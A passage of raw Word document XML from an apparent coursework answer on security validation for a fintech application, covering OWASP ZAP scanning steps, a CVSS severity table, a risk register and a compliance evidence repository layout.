          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Passive Scan Rules).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF36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Browse through the application manually or use Spider (Tools &gt; Spider) to crawl all pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF37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ZAP records all HTTP requests/responses and fl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>ags issues without sending attack payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF38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Passive alerts typically include: missing security headers, insecure cookies, information disclosure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF39" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECF3A" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step 3 — Active Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF3B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Right-click any node in the Site Tree and select Attack &gt; Active Scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF3C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ZAP sends cra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>fted attack payloads (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>, XSS, path traversal, etc.) to test for vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF3D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Configure scan policy (Scan Policy Manager) to focus on OWASP Top 10 categories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF3E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Monitor active scan progress in the Active Scan tab; alerts appear in the Alerts panel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF3F" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECF40" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>St</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ep 4 — Risk Classification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF41" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354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354F" w14:paraId="4BAECF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F42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Level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F43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CVSS Score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F44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 Vulnerability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F45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52354F" w14:paraId="4BAECF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47" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>High (Red)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48" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>7.0 – 10.0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49" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>SQL Injection, Broken Auth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4A" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Fix Before Deploy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECF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4C" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Medium (Orange)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4D" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4.0 – 6.9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4E" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>XSS, CSRF, Open Redirect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4F" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Fix Within Sprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECF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51" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Low (Yellow)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52" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>0.1 – 3.9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53" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Missing Security Headers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54" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Fix in Backlog</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECF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56" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Informational (Blue)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57" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>0.0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58" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Verbose Error Messages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59" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Review and Monitor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BAECF5B" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECF5C" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step 5 — Validation Evidence Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF5D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Generate HTML/XML/JSON report: Report &gt; Generate Report, select format and output directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF5E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Report contains: alert summary, affected URLs, evidence (request/response), CWE references, mitigation recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF5F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Export session file (File &gt; Save Session) to preserve the full scan state as evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF60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Screenshot the Alerts Summary panel and attach to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> the validation evidence repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF61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Log generated artifacts: zap-report.html, zap-alerts.xml, scan-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>session.session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF62" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECF63" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF64" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SECTION </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>D  –</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  Validation Risk and Compliance Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF65" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4. Validation Risk Management and Compliance </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Evidence  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5 Marks]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF66" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 1: Validation Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Register  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>2 Marks]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF67" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The following risk register identifies security and compliance risks for a fintech application subject to external audit review:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF68" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="005235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1355"/>
        <w:gridCol w:w="1304"/>
        <w:gridCol w:w="1050"/>
        <w:gridCol w:w="881"/>
        <w:gridCol w:w="1547"/>
        <w:gridCol w:w="1478"/>
        <w:gridCol w:w="1127"/>
      </w:tblGrid>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECF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ECF69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Risk ID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ECF6A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Risk Description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ECF6B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ECF6C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Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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ECF6D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ECF6E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Mitigation Strategy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ECF6F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Validation Control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ECF70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2354F" w14:paraId="4BAECF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2" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>R-001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3" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>SQL Injection via payment API endpoints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4" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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5" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F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6" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Critical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7" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Parameterized queries, WAF rules, code review gates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8" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP ZAP active scan + manual </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>pentest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9" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECF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B" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>R-002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C" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Sensitive financial data in plaintext HTTP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D" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Compliance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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E" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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7F" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F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0" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Enforce TLS 1.3; HSTS header enforcement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1" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>SSL/TLS scan; Wireshark packet capture evidence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2" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Mitigated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECF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4" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>R-003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5" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Incomplete audit logs — transactions not captured (PCI-DSS)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6" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Compliance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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7" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F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8" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F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9" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Logging middleware; SIEM log aggregation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A" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Log completeness audit; CI log coverage checks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B" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECF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D" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>R-004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E" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Broken access control — IDOR on user accounts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8F" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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90" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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91" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Critical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92" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Object-level authorization; RBAC policy review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93" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Automated IDOR test suite; penetration test evidence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94" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Under Review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BAECF96" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECF97" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Task 2: Compliance Evidence Repository </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Structure  [</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3 Marks]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF98" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>The following GitHub repository structure is designed for audit readiness, ensuring all compliance evidence is organized, versioned, and traceable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECF99" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="005235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354F" w14:paraId="4BAEC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2" w:space="0" w:color="2E75B6"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1E2D3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AECF9A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fintech-compliance-repo/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF9B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4BAECF9C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README.md                          # Repository overview and audit navigation guide</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECF9D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4BAECF9E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github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4BAECF9F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└── workflows/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFA0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validation.yml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# CI pipeline for automated validation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFA1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└── compliance-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check.yml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# Scheduled weekl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 compliance verification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFA2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4BAECFA3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01-validation-criteria/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFA4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├── validation-criteria.xlsx       # Measurable criteria per module</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFA5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>│   ├── validation-checklist.xlsx      # Test execution checklist with status</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFA6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└── acceptance-criteria.md         # Stakehold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er-approved acceptance conditions</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFA7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4BAECFA8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02-test-evidence/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFA9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├── unit-test-reports/             # JUnit XML reports from CI runs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFAA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├── integration-test-reports/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFAB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├── coverage-reports/              # Istanbul/NYC HTML coverage reports</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFAC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└── screensh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ots/                   # UI validation evidence screenshots</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFAD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4BAECFAE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03-security-validation/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFAF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├── zap-reports/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFB0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│   ├── zap-report-2025-01.html    # OWASP ZAP HTML scan reports (dated)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFB1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│   └── zap-alerts-2025-01.xml     # Machine-readable alert expo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rts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFB2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├── vulnerability-severity-table.xlsx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFB3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├── penetration-test-report.pdf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFB4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└── mitigation-evidence/           # Screenshots/logs showing fixes applied</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFB5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4BAECFB6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04-risk-register/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFB7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├── risk-register.xlsx             # Live risk register with status tracking</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFB8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├── risk-review-log.md             # Dated entries for each risk review</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFB9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└── residual-risk-acceptance.pdf   # Signed management sign-offs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFBA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4BAECFBB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05-compliance-frameworks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4BAECFBC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pci-dss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4BAECFBD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│   ├── pci-dss-compliance-matrix.xlsx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFBE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│   └── evidence/                  # Evidence mapped to PCI-DSS requirements</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFBF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gdpr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4BAECFC0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│   ├── data-flow-diagrams.pdf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFC1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│   └── privacy-impact-assessment.docx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFC2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└── iso-27001/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFC3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└── control-compliance-checklist.xlsx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFC4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4BAECFC5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06-ci-pipeline-logs/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFC6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├── run-logs/                      # Archived GitHub Actions run logs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFC7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└── artifact-hashes.csv            # SHA-256 hashes for artifact integrity</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFC8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4BAECFC9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└── 07-audit-packages/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFCA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├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── Q1-2025-audit-package.zip       # Quarterly compiled evidence packages</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFCB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├── Q2-2025-audit-package.zip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BAECFCC" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338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└── AUDIT-NAVIGATION-GUIDE.md      # Guide for external auditors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BAECFCE" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECFCF" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:spacing w:before="160" w:after="80"/>
